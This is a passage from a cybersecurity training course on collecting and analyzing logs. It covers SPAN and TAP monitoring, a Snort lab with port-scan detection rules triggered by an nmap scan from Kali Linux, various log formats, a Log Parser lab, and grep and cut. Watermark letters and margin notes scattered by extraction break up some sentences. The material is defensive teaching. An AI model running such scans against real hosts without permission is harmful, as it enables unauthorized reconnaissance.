• Alerts based on detection of anomalies, flow analysis patterns, and custom triggers you can
o
define.
• Integrated secure packet capture and storage capabilities.
D
• Visualization tools that enable you to quickly create a map of network connections, and interpret
patterns of traffic and flow data.
• Identification of traffic patterns revealing rogue user behavior, malware in transit, tunneling,
applications exceeding their allocated bandwidth, and so forth.
• Verifying that sensitive data is being transmitted in an encrypted form, and detecting any
sensitive data that flows in plaintext.

Many free and commercial network traffic and flow analysis tools are available, with names like
NetFlow, J-Flow, sFlow, ManageEngine NetFlow Analyzer, SolarWinds NetFlow Traffic Analyzer,
Multi Router Traffic Grapher (MRTG), Cacti, and ntop.
e
ut
ib
tr
is
Figure 7-8: Network flow data logs.
D
SPAN Ports and TAP Devices
SPAN Ports and TAP
Devices
or
Security systems that monitor live network traffic typically use one of two approaches: SPAN or
TAP. It's important to familiarize yourself with the differences between the two, as those differences
have an effect on the data you receive for analysis, as well as the overall performance penalties the
e
monitoring process has on the network.
at
Switch port analyzer (SPAN) is an approach in which a network appliance (e.g., a switch or
router) takes the network packets that flow to and from one main port (or virtual local area network
[VLAN]) on the device, then copies those packets to another port (the mirror port). The mirror port
lic
then forwards the copied packets to the network monitoring system. The amount of network traffic
the SPAN port "sees" is dependent on where it sits between other network devices and hosts.
SPAN ports are easy to configure remotely, but their critical disadvantage is the amount of overhead
up
they add to the network. Having to duplicate packets can lead to congestion, which in turn can lead
to the SPAN port changing frame timings or dropping entire packets.
Test access point (TAP) is not a port on an existing device, but a dedicated device itself. The TAP
device sits between network appliances, often between a switch and router, and forwards both
D
incoming and outgoing packets between those appliances to a security monitoring system. The
packets are still sent between the switch and the router like normal, but they are also copied to
ot
separate monitoring ports on the TAP device (one port for incoming traffic, one for outgoing).
Since the TAP device is a separate appliance, it will not cause any frame timings to be altered or
packets to be dropped. Also, forensic data captured through a TAP device is admissible in court in
N
certain jurisdictions, whereas data captured from SPAN devices may not be.
Despite their performance and reliability issues, SPAN ports are still useful for monitoring low-
traffic network segments. Otherwise, TAP devices are the preferred option, as they don't cause the
o
same performance degradation and even have some security benefits.

D

e
ut
ib
tr
is
D
or
e
at
lic
Figure 7-9: SPAN architecture vs. TAP architecture.

up
Log Tuning
Whether you're collecting firewall logs, IDS/IPS logs, syslogs, or any type of logging data, you'll Log Tuning
D
often need to strike a balance between the volume of information and the usefulness of that
information. The consequences of failing to log enough pertinent data may be a reduced ability to
identify and correct problems, but logging too much data could lead to another set of issues.
ot
Excessive logging might increase network and processing overhead, and depending on how the data
is collected, it might take up too much storage memory on hosts. It might also make the task of
N
analysis overly complex.

That's why it's important to tune your logs to make them as optimal as possible at providing you
with useful and actionable information. This is much more ideal than your logs being an unwieldy
o
resource that you reluctantly wade through to only maybe find something of value. The tuning
process can take time, however, as you need to evaluate what logs weren't collected but should have
D
been, and what logs were collected but should not have been. Once you've reached a point where
you're confident you've achieved the right balance, log tuning will have made your job easier and
more productive.

ACTIVITY 7-2
Collecting Network-Based Security Intelligence
Data Files
e
C:\CNX0013Data\Collecting Cybersecurity Intelligence\snort.conf
ut
C:\CNX0013Data\Collecting Cybersecurity Intelligence\local.rules
Activity: Collecting
Network-Based Security Before You Begin
ib
Intelligence
You'll be using your Windows Server® 2019 computer for this activity, as well as your Kali Linux™
Note that if your network
virtual machine (VM). Snort has already been installed on the server.
configuration does not
tr
use 10.39.5.0/24, you
will have to change the Scenario
is
var HOME_NET value in One of the primary ways you intend to gather security intelligence in the Develetech network is to
snort.conf for students. employ an IDS. You decide to begin your investigation of IDSs by looking at Snort—an established,
D
respected, and free IDS. You'll run the system on your Windows Server and write some basic rules
to test its ability to detect port scans.
1. or
Set up Snort to begin detecting scans.
a) On your Windows Server, from the course data files, copy the snort.conf file to the C:\Snort\etc
directory, overwriting the file that is already there.
e
b) Copy the local.rules file to the C:\Snort\rules directory.
at
c) Open the local.rules file using WordPad.

lic
up
D
ot
N
o
D

d) Observe the four rules in the file.
e
ut
ib
tr
is
D
The first detects SYN scans, the second detects ACK scans, the third detects XMAS scans, and the Explain the difference
fourth detects a web browser navigating to Facebook.
or
Each rule has a header and a body. The header includes the action, protocol, source IP address,
source port, direction, target IP address, and target port. The body must include at least an identifier
called a security identifier (SID) and a message called msg. Any line starting with a # is a comment
between the various
types of flags that might
be set in a packet, if
students are unfamiliar
e
with them.
line in Snort. For example, alert icmp any any -> $HOME_NET any (SID: 9000009;
at
msg: "ICMP Detected") would alert on every incoming Internet Control Message Protocol
(ICMP) packet it saw (primarily ping and traceroute). This would not be a very efficient rule, because
it would trigger all the time.
lic
The bottom four lines in the rule file limit the output of the four rules so they will only show the first
five alerts from a particular IP address every 30 minutes.
Note: There are many other optional fields to filter on in the body, but they
up
could fill a separate course. For extensive documentation and to check out
this free program, go to https://snort.org.
D
Note: HOME_NET is a variable that is set in your snort.conf file to the local
network IP addresses.
e) Close the local.rules file without saving.
ot
2. Begin capturing data with Snort.

N
a) Open PowerShell by right-clicking the Start button and selecting Windows PowerShell (Admin).
b) At the prompt, enter cd C:\Snort\bin
This is the default directory where the Snort executable resides.
o
c) Enter .\snort.exe -W
D

d) Identify the index of the network interface that has your server's IP address.
e
Note: The correct index on your server may be different than what's shown in
ut
the screenshot.
e) Enter .\snort -c C:\Snort\etc\snort.conf -i# -l C:\Snort\log -A console,
ib
where # is the network interface index you just identified.
• The –c command tells Snort where to find the configuration file.
tr
• The –i# command tells Snort to capture on the specific interface.
• The –l command tells Snort to log its alerts and where to save them.
is
• The –A console command tells Snort to additionally send the alerts to the console. You would
not use this option normally because it slows down detection and may cause Snort to drop
packets in a busy network. Sending data to the console is a good way to test your sensor.
D
When you execute the command, the console should show a large number of actions ending with
"Commencing packet processing." This indicates Snort is actively detecting intrusions.
or
e
at
lic
up
D
ot
N
f) Switch to your Kali Linux VM, open a terminal prompt, and enter sudo nmap –A 10.39.5.#,
where # is the last number in the IP address of your Windows Server.
o
Note: –A combines a SYN scan, ACK scan, and operating system discovery.
D
g) Allow the scan to complete, and then check the Snort command prompt on your Windows Server
2019 computer.
There should be five SYN scan alerts, five ACK scan alerts, and five XMAS scan alerts.

h) With the PowerShell window active, press Ctrl+C to end the capture.
Notice that Snort displays a summary data about the attack.
e
ut
ib
tr
is
D
If students are unsure,
3. How many TCP packets did Snort examine? have them run
4.
or
A: Answers will vary, but the number will be large, typically in the thousands.
Why do you think there were only five instances of each alert in the traffic?
Wireshark on the server
as they do the Nmap
scan.
e
A: The limits placed in the rules file show only the first five instances of each alert within a 30-minute
period.
at
5. Why limit the number of alerts?

lic
A: To not overwhelm your IDS with traffic and fill your logs with just a few loud attacks like this one.
6. When might you want to temporarily see every instance of an alert?

up
A: For analysis purposes once you know an attack is coming.
7. Examine your log file in Wireshark.

D
Note: In this mode, Snort captures entire packets and saves them in a file that is
readable with Wireshark or other protocol analyzers.
ot
a) On your Windows Server system, start Wireshark from the desktop.

b) From the File menu, select Open.
c) In the Wireshark ⋅ Open Capture File window, navigate to C:\Snort\log.
N
d) Select the snort.log file saved there and select Open.

o
D

e) Examine the captured packets, noting those containing FIN, PSH, and URG flags in particular.
e
ut
ib
tr
is
Note: XMAS scans are a way to evade some firewalls that track TCP
sessions. They are malformed packets containing the PuSH, URGent, and
D
FINish flags.
8. Were all of the XMAS scans identical? If not, how were they different?
or
A: No, some have just FIN, PSH, and URG, while the others include the SYN flag. Three of them are
marked by Wireshark as retransmissions.
e
9. Disable the alert limits and rerun the Snort capture.
at
a) Open the C:\Snort\rules\local.rules file in WordPad.

b) At the bottom of the file, type a # in front of each of the event commands to comment out these
rules and disable them in the next scan.
lic
up
D
ot
c) Save and close the local.rules file.

N
d) Run the Snort scan again as in step 2e.

e) Go to your Kali Linux system and run the sudo nmap –A scan of the server again.
o
10.How is the output in the command prompt different?

D
A: There are many more alerts. So many that it constantly scrolls.
11.After the scan completes, end the Snort session by pressing Ctrl+C and look
All of the scans from
Nmap may not run at the statistics.
because it remembers
the results from the last
scan, but the difference
should still be obvious.

12.Isthe number of TCP packets (or other statistics) significantly different from
the previous scan?
A: No, the numbers are about the same. Snort just alerted on more of the malicious traffic than
before.
13.Why is it important to carefully tune and limit your IDS rules in a production
environment?
A: To limit the number of alerts that are logged for the same attack and make sure that actual attacks
e
do not get lost in false positives. Storage space can also be a concern if a great deal of data is
logged over a period of time.
ut
14.Close PowerShell and Wireshark.
ib
tr
is
D
or
e
at
lic
up
D
ot
N
o
D

TOPIC C
Collect Data from Host-Based Intelligence
Sources
Now that you've collected intelligence from network-based sources, you can turn your attention to
e
host-based sources.
ut
Operating System Log Data
ib
You don't need to spend Systems such as Microsoft® Windows, Apple® macOS®, and Linux keep a variety of logs as users
too much time teaching and software interact with the system. The format of the logs varies depending on the system.
through each log format Information contained within the logs also varies by system, and in many cases, the type of
tr
in depth; you might information that is captured can be configured.
instead highlight the
System logs contain information such as:
is
differences between
each format. • Valid and invalid authentication attempts and resource use, such as creating, opening, or deleting
Operating System Log files.
D
Data
• When applications and services are started and stopped, and any errors that occurred.
• Remote access.
or
• Driver failures and hardware problems.
• Account and security policy changes.
Many of these logs contain information that can be useful in detecting or responding to security
e
problems. In many cases, administrators refer to these logs only when there is a problem, relying on
default configurations to maintain the logging they need. However, you can customize the system
at
logging feature or install third-party logging tools to collect more (or more useful) information. Of
course, this must be done in advance to take advantage of it.
lic
System logs are helpful when investigating problems involving a specific host. For example, if an
NIDS reveals an attack against a particular computer, the system logs for that computer could be
analyzed to determine if a user was logged in to the computer when the attack occurred.
up
Windows Event Logs

Windows Event Logs By default, Windows constantly records events it considers significant to the execution of the
D
The next lesson operating system. This can be everything from an application crashing to a user logging in to the
discusses Event Viewer system. As such, Windows can record thousands of events over a period of weeks, depending on
and goes into more how often the system is used and for what purpose. Typically, events provide information that can
ot
detail about Windows be valuable to the troubleshooting process. These events can also be used as security intelligence to
event logging. ascertain exactly what happened on a system at a certain point in time.
N
When events are generated, they are placed into log categories. These categories describe the general
nature of the events or what areas of the OS they affect. The five main categories of Windows event
logs are:
o
• Application: Events generated by applications and services, such as ones failing to start.
D
• Security: Audit events, such as failed logons.

• Setup: Events generated during the installation of Windows.
• System: Events generated by the operating system and its services, such as storage volume
health checks.
• Forwarded Events: Events that are forwarded to the computer from other computers.
Lesson 7: Collecting Cybersecurity Intelligence | Topic C

Figure 7-10: Errors in the System event log.
e
Syslog Data
ut
The syslog format has become a de facto standard for logging in Unix-like systems, such as Linux. Syslog Data
ib
Syslog logging is typically provided through a simple centralized logging infrastructure that provides
a common interface for log entry generation, storage, and transfer. Syslog is a TCP/IP protocol and
tr
can run on nearly any operating system. It is a bare-bones method used to communicate logs to
another system. It usually uses UDP port 514.
is
The typical syslog infrastructure consists of:
• Clients: Services and applications that need to log events send a message to a server, which may
D
be on a different host computer.
• Server: The syslog server listens for messages sent over the network.
• Storage: The server may store messages in flat files or in a database.
or
• Management and filtering software: Log management or filtering software accesses records in
storage and provides tools for filtering, viewing, or managing data.
Clients identify the importance or priority of each logging message by including a code for facility
e
and severity:
• Facility identifies the affected system by using a short keyword such as "kern" (operating system
at
kernel), "mail" (mail system), or "auth" (authentication or security). The facility may also be
shown as a number from 0 to 23, each of which maps to an affected system (e.g., "kern" maps to
lic
0).
• Severity values are a number from 0 (most critical) to 7 (not critical).
These codes help security analysts and analysis software determine which messages should be
up
handled most quickly. For example, you might configure a monitoring service to send a notification
to the administrator for all operating system kernel messages of severity levels 1 or 0.
Note: In order for facility and severity to appear directly in the syslog, you may need to
D
configure a template that uses these components in the /etc/rsyslog.conf file.

ot
N
o
D

e
ut
ib
tr
Figure 7-11: Sample syslog data. Most entries have a severity of 6, meaning the entry is
is
informational. A facility of 3 refers to system daemons.
D
Syslog Drawbacks
The original syslog protocol has some drawbacks. Using UDP delivery protocols does not ensure
delivery, so messages could be lost in a congested network. Also, it does not provide basic security
or
controls to ensure confidentiality, integrity, and availability of log data. Messages are not encrypted
in transit or in storage, and any host can send data to the syslog server, so an attacker could cause a
DoS to flood the server with misleading data. A man-in-the-middle attack could destroy the integrity
e
of message data.
In response to these shortcomings, newer syslog implementations introduced security features,
at
many of which are captured in the Requests for Comments (RFC) 3195, 5424, 5425, 5426, which
include:
lic
• The ability to use TCP for acknowledged delivery, instead of unacknowledged delivery over
UDP (port 514). There is no consistent TCP port that is used.
• The ability to use Transport Layer Security (TLS) to encrypt message content in transit. This uses
up
port 6514 regardless of whether it's TCP or UDP.

• Ensuring the reliability of syslog transmissions using Reliable Event Logging Protocol (RELP),
which formats syslog data in XML. This uses port 601.
D
• Protecting the integrity of message content through authentication and a hashing algorithm such
as Secure Hash Algorithm (SHA).
Syslog implementations may also provide additional features beyond those specified in the RFCs,
ot
such as message filtering, automated log analysis capabilities, event response scripting (so you can
send alerts through email or text messages, for example), and alternative message formats (such as
SNMP).
N
Application Logs
o
Application Logs In addition to system-level logs, you can configure and monitor application logs to obtain more
D
specific information about activities performed on the host. This includes browsers, collaboration
tools, and other end-user applications; databases; financial applications; custom business
applications; and other applications critical to the organization or that contain sensitive information.
It also includes services such as email servers, Simple Mail Transfer Protocol (SMTP) gateways, file
servers, web servers, DNS servers, and Dynamic Host Configuration Protocol (DHCP) servers.
Some applications provide their own logs, while others use system logs to record data.

Some information, particularly for applications that use encrypted communication, can only be
logged by the application itself. For this reason, application logs can be useful for auditing and
compliance, and for investigating security incidents related to specific misuse of application data.
Unfortunately, application logs tend to be in proprietary formats, with highly contextual data that
makes an analysis more complicated.
The following are some of the types of information you might obtain from application logs.
Log Source Description
e
Client requests and Server or client applications typically log a high-level description of each
server responses request and response (though not the actual content), which can help to
ut
reconstruct communication timelines, determine who made each request,
and provide the type of response returned. Server applications can
provide detailed logging, such as the sender, recipients, title, and
ib
attachments for each email, or each URL requested and the response
provided by a web server. Business applications can identify which
tr
financial records were accessed by users.
Account information Server applications may log events concerning specific user accounts,
is
such as successful and failed logins and account changes (such as
creation, deletion, and privilege assignment). In addition to identifying
D
security events such as brute-force password guessing and escalation of
privileges, account information can be used to identify who has used the
application and when each person has used it.
Usage information
or
Information about application usage, such as the number of transactions
within a certain time period or the transaction size (such as the size of an
email message), can be helpful when monitoring security. A sudden
e
increase in the size or frequency of certain transactions might indicate
specific types of security threats.
at
Significant operational Applications can log events such as an application startup and shutdown,
events application failures, and major application configuration changes. This
lic
can be used to identify security compromises and operational failures.

HIDS/HIPS logs A host-based intrusion detection and prevention system (HIDS/HIPS)
can log anomalous behavior with regard to how an application executes.
up
Slow execution, repeated crashes, or other odd behavior may indicate a

compromise. Additionally, an HIDS/HIPS often comes with an integrity
checker that can detect when a file on a computer is modified from its
D
preset baseline.
Anti-malware logs Anti-malware/antivirus applications may also provide useful insights into
how malicious software impacts a system.
ot
DNS Event Logs

N
A DNS server may log an event each time it handles a request to convert between a domain name DNS Event Logs
and an IP address.
o
DNS event logs can contain a variety of information that may provide useful security intelligence,
D
such as:
• The types of queries a particular computer has made to DNS.
• A list that can be searched for either IP addresses or domains to identify computers that are in
communication with suspicious sites.
• Statistical anomalies such as spikes or consistently large numbers of DNS lookup failures, which
may point to computers infected with malware, misconfigured, or running obsolete or faulty
applications.

e
ut
ib
Figure 7-12: A DNS event log.
tr
SMTP Logs
is
SMTP Logs Simple Mail Transfer Protocol (SMTP) is a protocol used in email communications. Mail
D
applications send messages in SMTP format to their relay server (e.g., an on-premises Exchange
server), which then forwards the SMTP-formatted message to the recipient's mail server (e.g., one of
Gmail's servers). The recipient's mail server then typically formats the message in Post Office
recipient. or
Protocol 3 (POP3) or Internet Message Access Protocol (IMAP) before forwarding it on to the
SMTP logs are typically formatted in request/response fashion: the local SMTP server sends a
e
request to the remote SMTP server to open a port for communications. The remote SMTP server
responds and, if successful, the local server begins forwarding the client's message. The logs at this
at
point typically record the time of request/response, the address of the recipient, and the size of the
message.
lic
Another component of SMTP log entries is the status code. Status codes indicate a remote server's
acceptance or rejection of a request or message. For example, the remote server may send code 220
after a request, indicating that the server is ready. After the local server provides the message
up
information, the remote server responds with code 250 to indicate the message itself is accepted.
Likewise, you can use SMTP logs to collect errors in transmissions that may indicate insecure email
activity. Code 421 in a remote server's response indicates the service is not available, and codes 450,
451, and 452 each indicate different issues with sending the actual message. Repeated failure entries
D
like these could be the sign of a DoS condition on either the remote or local SMTP server.
Note: For a full list of SMTP reply codes, navigate to www.serversmtp.com/en/smtp-error.
ot
N
o
D
Figure 7-13: An SMTP log entry example. A session with a remote server has already been
established, but the remote server is unable to deliver the message.

HTTP Logs
Web servers are typically configured to log HTTP traffic that encounters an error or traffic that HTTP Logs
matches some predefined rule set. Most web servers use the Common Log File (CLF) format to
record the relevant information. The CLF standardizes fields so they appear in the following order:
• The IP address of the client making the request.
• The RFC 1413 identity of the client (rarely used).
• The user ID of the client when authenticated on the site.
e
• The date and time the request was received, as well as the time zone.
• The request method used by the client (e.g., GET or POST) and the resource requested.
ut
• The HTTP status code of the server's response.
• The size, in bytes, of the resource returned to the client.
ib
tr
is
D
or
Figure 7-14: An example of an HTTP log entry. The hyphens indicate information that is not
available.
e
The status code of a response can reveal quite a bit about both the request and the server's behavior.
at
Codes in the 400 range indicate client-based errors, whereas codes in the 500 range indicate server-
based errors. For example, repeated 403 ("Forbidden") responses may indicate the server is rejecting
lic
a client's attempts to access resources they are not authorized to. A 502 ("Bad Gateway") response
could indicate that communications between the target server and its upstream server are being
blocked, or that the upstream server is down.
up
Note: For a list of HTTP status codes, navigate to www.restapitutorial.com/

httpstatuscodes.html. This list may not be exhaustive, as some vendors have their own status
codes.
D
HTTP Headers
In addition to status codes, some web server software also logs HTTP header information for both
ot
requests and responses. This can provide you with a better picture of the makeup of each request or
response, such as cookie information and MIME types. Another header field of note is the User-
N
Agent field, which identifies the type of application making the request. In most cases, this is the
version of the browser the client is using to access a site, as well as the client's operating system.
However, the User-Agent field is not always a reliable indicator of the client's environment.
o
SSL/TLS Debugging
D
In some cases, SSL/TLS connections may not be working as intended. The relevant debugging
information is typically not included in standard HTTP web logs, but in separate SSL/TLS logs,
assuming they are enabled on the server. However, these logs may either be too verbose or not
provide enough information. For example, an SSL/TLS log may record a failed handshake, but be
unable to clearly indicate why the handshake failed. In these cases, it may be more beneficial to use a
packet analyzer like Wireshark to capture and read SSL/TLS traffic in a human-readable format.

Wireshark enables you to decrypt the captured traffic if you provide the corresponding
cryptographic keys.
FTP Logs
FTP Logs File Transfer Protocol (FTP) servers log information differently based on the software they run, but
many conform to the fields set by the World Wide Web Consortium (W3C). These fields identify
the client and server in each transaction, as well as provide additional details about the transaction
itself. Other than the standard date, time, and client/server IP address fields, the following W3C
e
fields are also available and relevant for security intelligence purposes:
ut
• cs-username: The user name the client used to authenticate to the server.
• cs-method: The method or action taken by the client or server (e.g., ControlChannelOpened).
• cs-status: The protocol status code. FTP has its own set of status codes.
ib
• sc-bytes: The amount of bytes sent by the server.
• cs-bytes: The amount of bytes received by the server.
tr
• x-session: The unique ID assigned to the session.
• x-fullpath: The relative path from the FTP root directory to any directory specified in the action.
is
• x-debug: Additional information about the protocol status code (e.g., code 530 may produce
"User not signed in").
D
or
e
at
lic
Figure 7-15: An FTP log.

up
Note: For a full list of FTP status codes, navigate to https://en.wikipedia.org/wiki/

List_of_FTP_server_return_codes.
D
SSH Logs
ot
SSH Logs Secure Shell (SSH) logs are not necessarily as standardized as HTTP or FTP logs. Nevertheless,
most SSH server software comes with at least some logging functionality that records basic client/
server session information. Each event in an SSH log usually concerns session establishment and
N
termination rather than the actual details of a connection. After all, SSH is an encrypted protocol
meant to protect remote shell sessions from eavesdropping. So, logs often include:
o
• The date and time that each event took place on the server.
• The user name the client is using to connect.
D
• The client's IP address and return port.

• The client's SSH software.
• Whether or not the connection succeeded or failed.
• The cryptographic protocol used to secure the session.

e
ut
Figure 7-16: An SSH log.
ib
SQL Logs
tr
Databases that run on Structured Query Language (SQL) log daily server operations and user SQL Logs
interaction with the servers. Like a system event log, SQL servers record events with fields like date,
is
time, and the action taken. Normal actions can include server startup, individual database startup,
database cache clearing, and more. SQL logs also record error events, like databases failing to start
or shutting down unexpectedly.
D
SQL servers also record user interactions that can potentially be useful as security intelligence.
Administrators typically access SQL servers through built-in remote management consoles, and each
or
connection attempt, success, and failure is logged. Like any other system access log, you can use
these entries to determine whose account has been used to exfiltrate or tamper with data.
From a standard user perspective, SQL servers can also log individual query strings sent to the
databases. Other than the date, time, and user who sent the query, these logs also record:
e
• The query operation performed.
at
• The schema associated with the operation.

• The object of the query.
lic
Retrieving information on individual queries can provide you with actionable intelligence in the face
of an SQL injection attack or unauthorized modification of a database using hijacked credentials.
Logging all queries can significantly increase overhead, however, so log tuning is a must in this case.
up
D
ot
N
o
D
Figure 7-17: An SQL server log.

ACTIVITY 7-3
Collecting Host-Based Security Intelligence
Before You Begin
e
You'll be using Log Parser and Log Parser Studio, tools developed by Microsoft that enable you to
run queries on data. Both have already been installed on your server.
ut
Activity: Collecting Host-
Based Security Scenario
ib
Intelligence
You are not satisfied with looking through log files entry by entry, so you decide to try Microsoft's
Log Parser Studio to automate queries to your host-based log files. You could manually do all of
tr
these queries on your own, but a tool like this puts them all in one place. This is not as good as a
SIEM, but it will do until you get one.
is
1. Export your Windows Server logs.
D
a) On your server, from Server Manager, select Tools→Event Viewer.
b) In the center pane, observe how many events of various types are listed.
or
c) Note the number of errors your server has logged in the past 24 hours.
This depends on the server's activity.
d) In the console tree, expand Custom Views.
e) Select Administrative Events.
e
at
lic
up
D
ot
N
o
D

f) In the Actions pane on the right, select the Save All Events in Custom View As link.
e
ut
ib
tr
is
D
g) Name the file ServerEvents and save it on the desktop.
or
e
h) In the Display Information dialog box, verify the No display information radio button is selected.
i) Select OK.
at
j) Close Event Viewer.
Use Log Parser and Log Parser Studio to run queries on your saved log file.
lic
2.
a) On the desktop, open the LPSV2.D1 folder.
b) Right-click the LPS.exe icon and select Run as administrator to start Log Parser Studio.
up
c) Scroll through the possible database queries.

d) Select the yellow folder icon Choose log files/folders to query.
D
ot
N
e) In the Log File Manager window, select Add Files.

o
f) Navigate to the ServerEvents.evtx file and open it.

g) Select OK to close the Log File Manager.
D
3. Search for application error and remote logon events.

a) At the top of the screen, in the Search box, type event and press Enter.

b) Double-click EVENTS: Count Application Errors per Hour.
e
ut
ib
c) In the new tab, select the red ! button to run the query.
d) Right-click the Q1 tab and select Rename Tab.
tr
e) Name the tab AppErrors and press Enter.
f) Select the Library tab.
is
g) Double-click EVENTS: Find all Remote Logons.
h) Select the red ! button to run the script.
D
i) Rename the tab RemoteLogon
Note: It may take a few moments for the script to finish running.
If students need a hint,

remind them of using the 4.
or
Looking at the remote logon event list, can you tell what caused these
e
Metasploit tool from
earlier.
events?
at
Time permitting, have A: Several of these remote logon events were created when you remotely accessed the server using
students run additional the Metasploit PsExec exploit during the penetration test activity.
queries on the log file.
lic
5. What is the value of this tool beyond using Event Viewer alone?
A: Answers will vary. Log Parser can combine multiple logs, even from different devices. It also
automates many of the queries you would otherwise have to do by hand.
up
6. Close Log Parser Studio.

D
ot
N
o
D

Summary
In this lesson, you collected cybersecurity intelligence that can be used in later analysis efforts. You
prepared by deploying a collection strategy, and then you collected data from a wide range of
sources, including network-based and host-based logs. Understanding the purpose, characteristics,
and formatting of these intelligence sources is essential to gathering exactly what information you
need to detect and mitigate incidents.
e
What types of retention policies is the data in your organization or an use the social
organization you're familiar with subject to? How does this affect collection
ut
networking tools
efforts? provided on the CHOICE
A: Answers will vary. Students working in particular sectors or industries, such as healthcare, will need to Course screen to follow
ib
comply with applicable laws and regulations that define exactly how long to retain data like PII. Even
without legal pressure, organizations will also likely adopt their own retention policies based on
industry best practices, while also considering the sensitivity of each type of data. Either way,
tr
students may find that this reduces the amount of actionable intelligence they collect or store, while continued learning.
others may be unaffected as they don't get much use out of years-old data.
is
How does your organization or an organization you're familiar with tune logs to
optimize the amount of useful intelligence they provide?
D
A: Answers will vary. Potential log tuning tasks include: automatically configuring logs to roll over to new
files after reaching a certain size or after a certain period of time; logging only a certain amount of
or
events over a period of time; eliminating extraneous fields from logs, such as a destination field that is
always the same for every event; implementing standardized log formats to make it easier to correlate
logs from different appliances; and more.
e
at
lic
up
D
ot
N
o
D
Lesson 7: Collecting Cybersecurity Intelligence |

e
ut
ib
tr
is
D
or
e
at
lic
up
D
ot
N
o
D

8 Analyzing Log Data
e
ut
ib
tr
Lesson Introduction
is
Now that you've collected security intelligence from a wide variety of log-based sources, you
can begin to dissect those logs to reveal key information about potential threats and
D
vulnerabilities. Log analysis is a powerful process that can turn your security intelligence into
actionable data.
Lesson Objectives or
e
at
• Analyze a wide array of log data by using common Windows- and Linux-based security
tools.
• Incorporate a SIEM system into the analysis process.
lic
up
D
ot
N
o
D

TOPIC A
Use Common Tools to Analyze Logs
Analysis efforts can be strained if they're done manually, but plenty of tools are out there to make
your job easier. These tools can automate the analysis process and reveal useful information that you
may not have seen otherwise.
e
ut
Preparation for Analysis
Preparation for Analysis As you attempt to transform raw data into actionable intelligence, at some point between data
ib
collection and data analysis, you'll need to prepare your raw data to get it into a form that is useful
and efficient for analysis. To some extent, this may be done for you by your automation tools. You
may also have to manually prepare some data using capabilities provided by your logging and tracing
tr
tools.
is
A variety of skills can help you in the process of preparing data. Programming, shell scripting, or
batch file writing skills enable you to develop automation tools. The ability to write regular
expressions can help you search for patterns. Even tools like a word processing or spreadsheet
D
program may be useful in this process. Of course, the ability to use tools such as security
information and event management (SIEM) and log analysis tools is also helpful.
Guidelines for Preparing

or
Guidelines for Preparing Data for Analysis
e
Data for Analysis Note: All Guidelines for this lesson are available as checklists from the Checklist tile on the
at
Follow these guidelines as you prepare data for analysis.

lic
Prepare Data for Analysis

To prepare data for analysis, perform the following tasks. Note that these tasks may be performed
automatically for you by tools such as SIEMs.
up
• Filter out unnecessary or duplicate data: Some data may not be applicable to your analysis
and will slow down your processing.
• Combine sources: Different logs record different information, which may provide significant
D
insights into an attack when the logs are combined.

• Synchronize events logged in different sources: The internal clock setting may vary
significantly from one device to another, including different time zones. To be able to investigate
ot
how a situation unfolded, you need to be able to effectively view events in a timeline sequence.
• Normalize data formats: Different formats may be used for data, such as dates and times, and
N
information may be combined or presented differently in different log sources. Analysis is easier
when data is presented consistently.
• Store data securely: Once you have prepared the data for analysis, you'll need to ensure that it is
o
stored securely. Destroy any temporary files you may have created in the process. Separate from
any analysis or investigation you are conducting, your standard operating procedures should
D
ensure that the original logs are stored securely in support of applicable laws and compliance
regulations.
Log Analysis Tools

Log Analysis Tools There are a wide variety of log analysis tools available, and many of them provide just one or two
particular functions. These types of tools are meant to be used in combination with other such tools
Lesson 8: Analyzing Log Data | Topic A

to form a comprehensive suite of log analysis software. In other words, there's not necessarily one
monolithic tool that will enable you to do anything you could possibly need when it comes to
analyzing logs.
In this topic, log analysis tools are divided into the following categories:
• Linux® tools:
• grep
• cut
• diff
e
• Windows® tools:
ut
• findstr
• Windows Management Instrumentation Command-line (WMIC)
ib
• Event Viewer
• Scripting languages:
• Bash (Linux)
tr
• Windows PowerShell™
is
The grep Command
D
In Unix-like operating systems, the grep command searches text files for specific strings supplied by The grep Command
the user. This enables you to search the entire contents of a text file for a specific pattern, and
display that pattern on the screen or dump it to another file. This is an extremely powerful and
most popular tools in Linux computing.

A simple example of grep in action is as follows:
or
useful ability for both administrators and end users alike, and grep has therefore become one of the
e
grep 10.39.5.10 iplog.txt
at
This searches the text file iplog.txt for all lines containing some variation of the text "10.39.5.10"
and prints those lines to the terminal.
lic
The grep command is essential in analyzing Linux logs because it gives you the ability to pinpoint
the exact information you're looking for, regardless of how large and unwieldy the entire log file
appears to be. Some log analysis–related use cases for grep include:
up
• Searching for specific facility codes, like authorization messages.

• Searching for specific process IDs.
• Searching for specific details of an event, like applications or servers starting up.
D
• Searching for specific IP addresses or domains to determine the source or destination of traffic.
• Searching for specific dates and times during which an event may have occurred.
• Searching multiple log files in one search operation.
ot
N
o
D
Figure 8-1: Searching the Linux syslog for entries with the NetworkManager process.

Options
Other than its default behavior, grep provides the following options.
Option Description
-i By default, search strings in grep are case sensitive. This option ignores
case sensitivity.
-v Reverses the grep command's default behavior, returning only lines that
do not match the given string.
e
-w Treats search strings as discrete words. By default, the string "add" will
ut
also return "address". With this option, the string "add" will only return
instances of the word "add" by itself.
ib
-c Returns the total count of matching lines rather than the lines themselves.
-l Returns the names of the files with matching lines rather than the lines
tr
themselves. Primarily used in multi-file grep searches.
-L Similar to the behavior of the -v option, in that it returns the names of
is
files without matching lines.
-r Searches recursively within the given directory. This is useful when the
D
files you're searching are in different subdirectories.
The cut Command

The cut Command
or
Using grep is great for finding lines with the information you're looking for. But what if you want
to trim these results to only return certain information from each line? For instance, you might be
e
interested in only the time and date an event occurs—not its detailed event information or anything
at
else that might end up being too much visual "noise." This is where the cut command comes in
handy. The cut command enables you to specify which text on a line you want to remove from
your results so they're easier for you to read. This can eliminate the frustration and inefficiency of
lic
poring over logs with excessive information on each line.

Many cut operations use the -c option, which enables you to specify which characters to cut.
Here's a basic example:
up
cut -c5 syslog

This will return only the fifth character in each line of the syslog file. You can also specify multiple
characters to cut or a range to cut by using c#,#, and c#-#, respectively.
D
The other major use of cut is with the -f and -d flags. Take the following example:
cut -d " " -f1-6 syslog
ot
The -d flag creates a delimiter, or a character that acts as a separator. In this case, the delimiter is a
space. The -f flag is similar to the -c flag, but instead of cutting by characters, it cuts by whatever
delimiter you specified. So, the aforementioned example will return the first six groups of characters
N
separated by a space.
o
D

e
ut
ib
Figure 8-2: Using a delimiter to cut the syslog so that it shows only the date, time, source, and
process related to an event.
tr
Note: The Kali Linux syslog that this example was taken from separates the month and the day
by two spaces. In other Linux distributions, you may only need to cut the first five groups to get
is
the same results.
D
The diff Command
or
The diff command takes two text files and returns how those files differ. It does this line by line,
